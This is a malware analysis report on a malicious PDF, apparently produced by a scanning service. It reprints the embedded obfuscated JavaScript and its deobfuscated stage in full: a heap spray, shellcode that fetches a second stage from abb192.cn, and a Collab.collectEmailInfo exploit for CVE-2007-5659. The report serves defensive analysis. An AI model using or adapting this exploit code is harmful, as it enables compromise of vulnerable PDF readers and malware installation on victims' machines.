Malicious PDF — malware analysis report

Static analysis result for SHA-256 31bf9190f40ea1fb…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 4973bffe34280332c4e290031ced9636 SHA-1: 561e12da7de4a381d30791a344672adc92e3e80c SHA-256: 31bf9190f40ea1fba350d898e6d180a0f1d73d666a794a3065f79c85ce5ce244
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The eval() call suggests the script is obfuscated and designed to execute arbitrary code. The presence of a suspicious extracted artifact named 'javascript_obj0013_001.js' further supports this. The script's likely intent is to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function Pre8Q3W4Vp25mp(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function G2SWYU(PzCsG0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(PzCsG0)"+";"+"}");eval("function hrLXkd(F8HjbwXB){var nPsYrax="+"0,eAkPa5K65=F8HjbwXB.l"+"en"+"gth,m1iuOrm=10"+"2"+"4,OWO3pWKZ8,wJOWT9,sCGAH='',hHZLgQ8Qp=nPsYrax,ArTKC4ST0lrfF=nPsYrax,XKCrUUivlHH=nPsYrax,EPsW4hOX3baU=Ar"+"ra"+"y(63,14,26,46,18,42,20,30,28,54,0,0,0,0,0, …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl3/load.php?id=18&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36C 6377 bytes
SHA-256: 4a2fda3c7d0f099cb5ea427c2d4577e1cd156a020232e08d4f8893f80043ac27
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 126 of 218 identifiers look randomly generated (e.g. 'd6UGLCUkdCUkXC4nsbMXzBZeHz'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function Pre8Q3W4Vp25mp(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function G2SWYU(PzCsG0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(PzCsG0)"+";"+"}");eval("function hrLXkd(F8HjbwXB){var nPsYrax="+"0,eAkPa5K65=F8HjbwXB.l"+"en"+"gth,m1iuOrm=10"+"2"+"4,OWO3pWKZ8,wJOWT9,sCGAH='',hHZLgQ8Qp=nPsYrax,ArTKC4ST0lrfF=nPsYrax,XKCrUUivlHH=nPsYrax,EPsW4hOX3baU=Ar"+"ra"+"y(63,14,26,46,18,42,20,30,28,54,0,0,0,0,0,0,5,41,0,21,56,4,62,17,12,39,40,19,52,6,34,29,61,55,51,49,45,22,10,60,9,59,8,0,0,0,0,7,0,50,48,44,37,16,47,57,35,3,53,25,38,27,31,11,58,2,13,32,23,36,24,43,15,1,33);f"+"o"+"r(wJOWT9=M"+"at"+"h.c"+"ei"+"l(eAkPa5K65/"+"m1iuOrm)"+";wJOWT9>nPsYrax;wJOWT9-"+"-){fo"+"r(OWO3pWKZ8=Ma"+"th.m"+"in(eAkPa5K65,m1iuOrm);OWO3pWKZ8>nPsYrax;OWO3pWKZ8-"+"-,eAkPa5K65-"+"-){XKCrUUivlHH|"+"=(EPsW4hOX3baU[F8HjbwXB.cha"+"rCod"+"eAt(hHZLgQ8Qp+"+"+)-48])<"+"<ArTKC4ST0lrfF;if(ArTKC4ST0lrfF){sCGAH+"+"=G2SWYU"+"(105^XKCrUUivlHH&"+"2"+"5"+"5);XKCrUUivlHH>"+">="+"8;ArTKC4ST0lrfF-"+"="+"2;}el"+"se{ArTKC4ST0lrfF="+"6"+";}}"+"}return (sCGAH);}var fGwPWx2rAsLe=implode('',['X','P','yqmuLZ2rio8b','e46dLyHDG4','JcSMZBGe','BXC4','x','bS','yVL','yBM8e4WBq','Mv@K','M78','sBnbeeGWj1bB','C','GXS','y','VmzqUN','BNU','BduEX','g','GBB','6BiX@6EnTiHeO6yH8siOEbe','mC@_','Jc@','VvX','qZ2y','u','EGWj1bBC4qG','C','4G','Wj','1bBd','66u6EnTi','H','edECX@StYBi6_Ay_','oJ','G_m','Bby1','E6U','@SyVmzqUNBNUMT@e4dLMHL','y_','m8e4','G','Wj1','bBd6XGG4xbSyVLyBM8e4xEy','Hi','L','BMRbsXlEEeXXG4nsbMX','gGUFuyH','b','uE','CXd','CEkAeU','Vud','qkAs6XPyqmuEXGSd_0','bqE','xW','qZeEaV0','uECXSSyHJzqZ','uyiy','TEK8LdUOA','@K8LdUOA@K8','L','dUOA@K','8uj','occqK8JdU8TqK8Wjt5B@K8E','CUw','B@','K8EC','Ukz@K8','bao2A@K8ba','U','OA@','K','8ba','VfsqK8b4','6kS@K','8Wa','o','cJq','K','8WaofWq','K8','EjV','7PqK8LaoOSqK8b','ao','c','WqK','8W','C','tcWqK','8bNUJW','qK8Bjonj@K8LjUf','J@','K8Bj','onj@K8','W','@o','cD@','K8','bao','kA@K8baoc','cqK8WCtcWqK8cq','6kA@','K','8W@UG','g@','K8bqU','Js@','K8udtk','A@K8','bao','vz@K8baocWqK8sqVnP@K8cq6ccqK8','DdtGg@','K8W@tvz','@K8udtcs@K8bao','vPqK8','b','aocWqK8','s','qV','nP@K','8c','q6','cD@K8JqVGg@K8','sCU8PqK8udt','mjqK8','baokjqK8ba','o','c','W','qK8','sqVn','P@','K8cq','6c','J@K8uCU','Gg@K8','u','jomz@K8udtG','P','qK','8b','ao2TqK8','baoc','WqK8sq','VnP@K8','cq6f','WqK8','c@','oGg','@K8u@VeP@K8udt8g@K8baomy','@K8ba','oc','W','qK8sqVnP@K8saofcqK','8','LN','tnPqK8B@','V','mAqK8WjtvS','@K','8WNtJsq','K8','b46kP@K8','b','ao','cbqK8','c','qUcWqK','8B@','VnP@K8','W','Ct5cqK8b','aVJsqK8bqoGS@K','8WCtwW@K8WNtwsqK8udtwB@','K8b','a','o','n','j@K','8baocWqK8','EdtwWq','K','8Wq','tTB@K','8Bjo5u@','K8D','C6','kg@K','8','bao','c','WqK8WjtcWqK8','WNUJs','qK8c@Vnj@K8cjonAqK8WjtwW','qK8Jao','JsqK8s','CUGg@K8bao','cWqK8caocWq','K8sqVnj@K8E','@tf','cqK8cat','cLqK8cqVn','j@K8udtf','D@K8baoG','SqK','8bao','cWqK8sqVcJqK8c','C65WqK8','cNUcWqK8J','qU','ez@K','8cC6Gz','qK8baVJWqK8E@Veg@K8baocWqK8B@Vvd@K8WCt5WqK','8bNUJsqK8','bqoGS@K8WCtwW@','K8WNt','wsqK8s','ao','kg@K8baocWqK8E@tcWqK8cNtc','E@K8sqVcJqK8','LNV5c','q','K','8cNV2j@K','8sCUwJqK','8JaoezqK8cNVwWqK8','sqVnj@K8E@tfJ@K8catcsqK8cqVn','j@K8u','dt','fD@K8bao','5JqK8bao','cWqK8baoGS@','K8B@Vvd@','K8','WCt5WqK8bNtJs','qK8b','4o','G','S@K8WCtwW@K8','W','Nt','w','s','qK8W','ao','kg@K8','b','aocWq','K','8E@tc','WqK8WCtvd@','K8WaoJsqK8','bqo','GS@K8WCtwW@','K8','WNtwsqK8baokg','@K8ba','ocWqK8','sqocWqK8c4owL@K8u@ocJqK8u@o','cJqK8u','@ocJqK8u@','ocJq','K8udUnAqK','8cqtccqK8WC','tw','JqK8uC','o','2','S@K8','c4ov@@K8ujovd@K8WCtwsqK8WCt','kA@K8bN','t','eT','@K8caU','nj@K8cq6cJ@K8BdVnj@K','8WCtTJ@K8WqUeTqK8bNVeg@','K8cq6v','A','qK8B','@6nj@K8b','N','V','5','W','qK8LNVvAqK8','satmP@K8L','jU','JbqK8cdVcJq','K8LNV','wB','@K8b','4U','vy','@K8Wa','o8z@K8sCoTb@K8bNteTqK8c@UmSqK8','bNVc','c@K8saov','jqK8','s','@okj@K','8s@UTL','@K8B@Vws@K8cq','t','kzqK8u','Ctnj@K8cqtnj','@K8b','NV5cqK8E@62T@K','8bNUn','j@K8WCtJ','L@K8','WNUw','b@K8JjUcJqK','8baVnj@K8','bNVnj@K8cqUm','zqK8c','Co','wc@K8baocD@K','8sjVk','g','@K8sC','Uvz@K8cqVvd@K8s','NUwLqK8s4','UJc@K8b','aoJs@K','8D','Ctn@@K8D','CU7j@','K','8','cjo','2zqK8W@UmPqK8WjU','nT','@K8J@','6','2z@K','8c@o','2T','@K8W@onA@K8Dd','UmP','qK','8WdV7d@K8c','jo','2A@K8WjonAqK','8WCtnz@','K8DCUmSqK8','DCUn@@K8W@','6','2','PqK','8','JConj@K8JC62z@K8DdUmP@K8W','dV7d@','K','8JC','t','2','ja','4BX','C4nsbMXyKo8LzZKuGMT','vBx','pDC4','6d6UGLCUkdCUkXC4nsbMXzBZeHz','U5cGivkaqTuEC','X','G4','68gSxcBSifBqEzcax','_CBi','_De_','yuLeXTd6','XPyq','m','uE_J','c@VvXqZ2','dECXyKo8LzZKuGMTvBxpDC','4Ed6eZBqEKJdVmLBUlceo','qdCE2@@e4d','L_','Zc','G4GWj1bBC4','6dE__','bsMV','seM','HEL4H','Sy6kyCUHSy6','kyCUo','yu6X@StY','Bi6XGC4WBq','Mv@KM78sBnbeeGW','j','1bB','CGXS','yVmzqUNB','NU','BXC4nsb','MXSSHJ6s1IWeXy','bbVSuECX@u_kgKMbBK4Ed6','UGL','CUk','dC','Uk','yuGbLq_OZaEkuGoMbh1','7','X','C4xv','bMX@L','_ZcG4K','bNMZ8sxeJ4','6k','Cqi6dd6','KbNMZ8sxeJ','46k','CqiCSSHJ','6s','1I','W','eXybb','V','SZjEc','Jyq_DiE','5ECUdbseqy64','4','uL','Z2rio8bsHK','bNM','Z8sxeJ46','kCqiLuECX','@StYBi6XX64uE@t7Wi','oeW','bo','sBGZwWh6XGG','46uLi88sqOBsy_u','L1mCNtWDd','XPWj11','Dyty','EEeXXG4nsbM','XPq_','mJKxmjN','_','lL','y','Z','X','GC4Z','uGM','_','P','y','BHDyimWiimJ','yBM','8','bG','Ovs1Oc','y','B_DeeB','XC4fb','S','M','pLRUTD','zX','OB','446','dLo8','cz','1PcC','o7v4_s8LMHuGyZJBiy','k6','rTvui@TL4BX','C4nsbMXyyxrcKx','x8BqJ','LG46d','LyHDG4JcSMZB','Gef','bS','MpLRU','TDzXOBaGV','EB','qms4_yd@e@Pq','_','mJKx','mjN_l','LyZ_Ae','BZ','cyVOEEUBCL','o8cz1','PcCo7','v4','_s8u','qysbM','JLG','emyEe4dEBxu6eyy','yxr','cKx','x','8Bq','JLzHkGK46GC','4Gd','LKxd6eyyy','xrcK','x','x8','BqJ','Lz','HvGK4','6','GC4vdLKxdEEWLb1PW','byZs4_ac','@rXCC','4','my64C6G4ebKiYLR','i_sBV','OZiULu6CXz@eBd6@','Cu6eeb','KiYLRi','_sBVOZKULuE','C6','dutXPL','K','Xyyxr','cKxx8Bq','J','Lz','HvGK4CdEUBd6@Cu6eebKi','YLRi_sBVOZ','KUL','u6CXg@eBd','u','EX','P','eE','bHeiv','Hiilv4e','BXC4nsbMX@BED','Ha_WsdowW','G6XG','C488Bi2','JBqkbeeoSE_','kAeUVbE_kAeUVc','Ee4du_yBeyHE6Be','sRZnbiU3ca_G','O6yH8si','OEe','4Cd6tOy@tmy6','4yBy1','h','WyxvgaVn','EC4','qG','C4y','By1hWyx','vg','aVnE','d6','XjGBB','JSGVvey@sbqpLzym','be4','6','duVM6eyZ','c','bGVvey@','bsqObqyZBey','s8biM','EuE','2bS','qiH','C4oT','6GEJz','i','K','d','6B','es','RZnb','iU3','ca_G','Gye4dE@XGG4YcCX7Sh','tlLRtYDs_','8@e','eB','X','@']);");eval(hrLXkd(fGwPWx2rAsLe));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36C 2588 bytes
SHA-256: d5ba8bb4095d5f85024df1caa610fcf22e133769a0796a06b68615d14fe28e98
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var J3ZEue = new Array(); function UIq1Xpwnkve(x6RY9, uA2A1KI3) { while (x6RY9.length*2<uA2A1KI3){x6RY9 += x6RY9;} x6RY9 = x6RY9.substring(0,uA2A1KI3/2); return x6RY9; } function fxYjdqZeOO() { var w0WpYY = 0x0c0c0c0c; var M85wVEyfFIyHBV = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3831%u7326%u6C70%u343D"); var YDutKzppDoUS7 = 0x400000; var aIyz3Crd1ObD = M85wVEyfFIyHBV.length * 2; var uA2A1KI3 = YDutKzppDoUS7 - (aIyz3Crd1ObD+0x38); var x6RY9 = unescape("%u9090%u9090"); x6RY9 = UIq1Xpwnkve(x6RY9, uA2A1KI3); var uZAlSNfLheBX = (w0WpYY - 0x400000)/YDutKzppDoUS7; for (var zEsanWyC80Le=0;zEsanWyC80Le<uZAlSNfLheBX;zEsanWyC80Le++) { J3ZEue[zEsanWyC80Le] = x6RY9 + M85wVEyfFIyHBV; } } function R2L7U7OT6Rgw5h() { var FurST2DwOtI = app.viewerVersion.toString(); FurST2DwOtI = FurST2DwOtI.replace(/\D/g,""); var yUdRTfnaAt = new Array(FurST2DwOtI.charAt(0),FurST2DwOtI.charAt(1),FurST2DwOtI.charAt(2)); if ((yUdRTfnaAt[0] == 8 && ((yUdRTfnaAt[1] == 1 && yUdRTfnaAt[2] < 2) || yUdRTfnaAt[1] < 1)) || (yUdRTfnaAt[0] == 7 && yUdRTfnaAt[1] < 1) || (yUdRTfnaAt[0] < 7)) { fxYjdqZeOO(); var hyQJvU1GBv8 = unescape("%u0c0c%u0c0c"); while(hyQJvU1GBv8.length < 44952) hyQJvU1GBv8 += hyQJvU1GBv8; this.collabStore = Collab.collectEmailInfo({subj: "",msg: hyQJvU1GBv8}); } } R2L7U7OT6Rgw5h();

Open this report in the interactive analyzer, or submit your own file for analysis.